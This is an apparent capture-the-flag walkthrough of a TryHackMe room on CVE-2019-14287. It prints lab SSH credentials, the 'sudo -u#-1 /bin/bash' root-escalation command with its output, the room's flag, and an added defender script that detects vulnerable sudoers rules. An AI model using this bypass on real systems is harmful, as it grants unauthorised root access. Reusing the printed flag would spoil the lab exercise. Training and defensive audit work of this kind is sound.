Tryhackme - Sudo Security Bypass


In this walkthrough, we will go through the Sudo Security Bypass room from Tryhackme. In this room, we will explore CVE-2019-14287, a vulnerability in the Unix sudo program, and exploit it to get root. On that note, let’s get started.


Machine Info:

Title: SudoVulns
IP address: 10.10.177.149
Difficulty: Easy
Objective: A tutorial room exploring CVE-2019-14287 in the Unix Sudo Program. Room One in the SudoVulns Series

Task 1 – Deploy!


ssh -p 2222 [email protected]


Task 2 – Security Bypass

SSH into that machine you deployed earlier, using port 2222.

The credentials are:

Username: tryhackme
Password: tryhackme

If you’re using Linux, the command will look like this:

ssh -p 2222 [email protected]

Question 1 – What command are you allowed to run with sudo?

sudo -l


 /bin/bash

Question 2 – What is the flag in /root/root.txt?

tryhackme@sudo-privesc:~$ sudo -u#-1 /bin/bash
root@sudo-privesc:~# 
root@sudo-privesc:~# id
uid=0(root) gid=1000(tryhackme) groups=1000(tryhackme)
root@sudo-privesc:~# whoami 
root
root@sudo-privesc:~# cat /root/root.txt 
THM{l33t_s3cur1ty_bypass}
root@sudo-privesc:~# 


THM{l33t_s3cur1ty_bypass}
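
Added example, not part of the original walkthrough or the room: a defender-side audit for the condition the session above depends on. It assumes the upstream fix in sudo 1.8.28 and a sudoers rule of the form (ALL, !root); the function names, sample sudoers lines and version strings are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit for CVE-2019-14287 exposure. Not part of the room.

FIXED_IN="1.8.28"   # upstream sudo release that fixed CVE-2019-14287

# ver_lt A B: succeed when version A sorts before B. A packaging suffix
# such as the "p2" in "1.8.21p2" is ignored.
ver_lt() {
    a=${1%%[!0-9.]*}; b=${2%%[!0-9.]*}
    for i in 1 2 3; do
        x=$(printf '%s' "$a" | cut -d. -f"$i")
        y=$(printf '%s' "$b" | cut -d. -f"$i")
        x=${x:-0}; y=${y:-0}
        if [ "$x" -lt "$y" ]; then return 0; fi
        if [ "$x" -gt "$y" ]; then return 1; fi
    done
    return 1
}

# risky_rules FILE: print non-comment sudoers lines whose Runas list grants
# ALL and then negates root, e.g. "(ALL, !root)". Blocking root this way is
# what the -u#-1 request in the walkthrough gets around on unpatched sudo.
risky_rules() {
    grep -v '^[[:space:]]*#' "$1" |
        grep -E '\(([^)]*[,[:space:]])?ALL[[:space:]]*,[^)]*![[:space:]]*(root|#0)[[:space:]]*[,:)]' || true
}

# exposed VERSION FILE: succeed only when sudo is older than the fix AND
# the file holds at least one risky rule.
exposed() {
    ver_lt "$1" "$FIXED_IN" && [ -n "$(risky_rules "$2")" ]
}

# Constructed sample sudoers content (not copied from the room's machine).
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
# old rule, disabled: bob ALL=(ALL, !root) /usr/bin/vi
alice     ALL=(ALL:ALL) ALL
tryhackme ALL=(ALL, !root) NOPASSWD: /bin/bash
EOF

# On a real host, take the version from `sudo -V` and audit /etc/sudoers
# and the files under /etc/sudoers.d as root. Versions below are constructed.
for v in 1.8.21p2 1.8.28 1.9.5p2; do
    if exposed "$v" "$SAMPLE"; then echo "sudo $v: EXPOSED"; else echo "sudo $v: ok"; fi
done
```

Upgrading sudo to 1.8.28 or later closes the bypass; rewriting the rule to list the permitted target users explicitly removes the dependence on the negation.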



So that was “Sudo Security Bypass” for you. In this room, we explored CVE-2019-14287, a vulnerability in the Unix sudo program, and exploited it to get root. We logged into the server using SSH, then used the sudo bypass command and got our root flag. On that note, I will take your leave, but stay tuned for the next one and till then, remember to “Hack the planet”.
